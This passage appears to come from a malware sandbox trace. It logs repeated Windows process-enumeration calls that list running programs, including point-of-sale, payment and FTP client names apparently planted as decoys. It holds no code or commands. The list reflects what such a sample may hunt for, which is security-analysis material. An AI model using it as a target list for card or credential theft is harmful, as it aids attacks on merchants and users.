th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0197.160] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0197.161] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0197.163] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0197.165] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0197.167] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0197.172] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0197.174] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0197.176] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0197.178] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0197.179] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0197.181] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0197.183] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0197.185] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0197.187] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0197.189] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0197.190] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0197.192] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0197.195] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0197.196] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0197.198] CloseHandle (hObject=0x1990) returned 1 [0197.198] Sleep (dwMilliseconds=0x64) [0197.348] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd8 [0197.422] Process32First (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0197.426] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0197.428] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0197.430] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0197.432] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0197.435] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0197.438] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0197.440] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0197.452] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0197.455] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.458] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.460] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0197.462] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.465] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.470] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.473] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.475] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.478] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.480] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.483] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0197.485] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0197.487] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0197.490] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0197.511] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.514] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0197.515] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0197.517] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0197.519] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0197.520] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0197.522] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0197.523] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.525] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0197.526] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0197.528] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0197.530] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.531] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0197.533] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0197.534] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0197.536] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0197.537] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0197.539] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0197.541] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0197.542] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0197.544] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0197.545] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0197.553] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0197.555] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0197.556] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0197.558] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0197.559] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0197.561] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0197.563] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0197.564] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0197.566] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0197.567] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0197.569] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0197.571] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0197.572] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0197.574] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0197.576] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0197.578] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0197.580] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0197.582] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0197.585] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0197.588] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, 